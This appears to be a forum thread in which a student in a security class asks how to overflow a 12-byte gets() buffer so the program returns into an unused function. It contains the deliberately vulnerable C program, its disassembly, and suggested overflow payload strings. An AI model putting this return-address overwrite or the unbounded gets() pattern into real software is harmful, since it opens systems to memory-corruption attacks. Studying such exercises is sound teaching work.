Smashing the Stack

Question

So I'm working on an assignment for a security class and the assignment is to use a stack overflow to call the function oopsDidISmashTheStack that is never used it the program.

#include <stdio.h>
#include <stdlib.h>

int oopsDidISmashTheStack(void)
{
    printf("Yup, smashing the stack is fun!\n");
    exit(0);
}

int getUserInput (void)
{
    char buf[12];
    gets(buf);
    return(1);
}

int main(void)
{
    getUserInput ();
    printf("Overflow failed, normal return\n");
    return(1);
}

I understand the concept of that after the buf variable is the sfp and then the return address what I can't figure out is the input that would change the return value to the address 0x080484fc which is where the function is located. I thought that it would require 12 characters to fill the buffer and then I was under the impression that sfp and return where 4 bytes so I trying to fill sfp with another 4 random characters and then use \xfc\x84\x04\x08 to make the return address point to the function.

If anyone is familiar with how the stack memory works and could explain where I'm going wrong that would be great?

Can you add the disassembly that you get for `getUserInput` ? — us2012, Oct 01 '13 at 01:11
Dump of assembler code for function _Z12getUserInputv: 0x080484b4 <_Z12getUserInputv+0>: push %ebp 0x080484b5 <_Z12getUserInputv+1>: mov %esp,%ebp 0x080484b7 <_Z12getUserInputv+3>: sub $0x18,%esp 0x080484ba <_Z12getUserInputv+6>: lea 0xfffffff4(%ebp),%eax 0x080484bd <_Z12getUserInputv+9>: mov %eax,(%esp) 0x080484c0 <_Z12getUserInputv+12>: call 0x8048390 0x080484c5 <_Z12getUserInputv+17>: mov $0x1,%eax 0x080484ca <_Z12getUserInputv+22>: leave 0x080484cb <_Z12getUserInputv+23>: ret End of assembler dump. — Jesse Taylor, Oct 01 '13 at 01:33
Hmmm, that looks okay. Have you stepped through it with `gdb` or a similar debugger to see whether what is happening agrees with what you expect? — us2012, Oct 01 '13 at 13:34
I've tried that and looking at the info frame and I think it is but i'm also not very familiar with the output from it so I could be totally wrong. — Jesse Taylor, Oct 01 '13 at 23:59

Michael · Answer 1 · 2013-10-04T06:49:37.993

0

You're pretty much on the right track. I suggest you look at the stack and see if the return address is where you think it is. There might be something else in there. Also double check the endien-ness,

I assume this is your input string?

"012345678901xxxx\xfc\x84\x04\x08"

What is the output of your program, generally if you're close but don't get it quite right the program crashes :)

edited Oct 04 '13 at 06:49

answered Oct 01 '13 at 02:34

Michael

2,118
1
19
25

I just get segfaults. – Jesse Taylor Oct 01 '13 at 02:57
From your assembly out looks like 24 words are reserved (0x18). Perhaps the system is working with Unicode, double byte strings . In that case the input string is being unpacked and thus the return address is not created correctly. – Michael Oct 03 '13 at 23:58
Or it is not being unpacked, and you need 24 bytes instead of 12 to reach the end of your buffer... "012345678901234567890123xxxx\xfc\x84\x04\x08" – Michael Oct 04 '13 at 06:48

Smashing the Stack

1 Answers1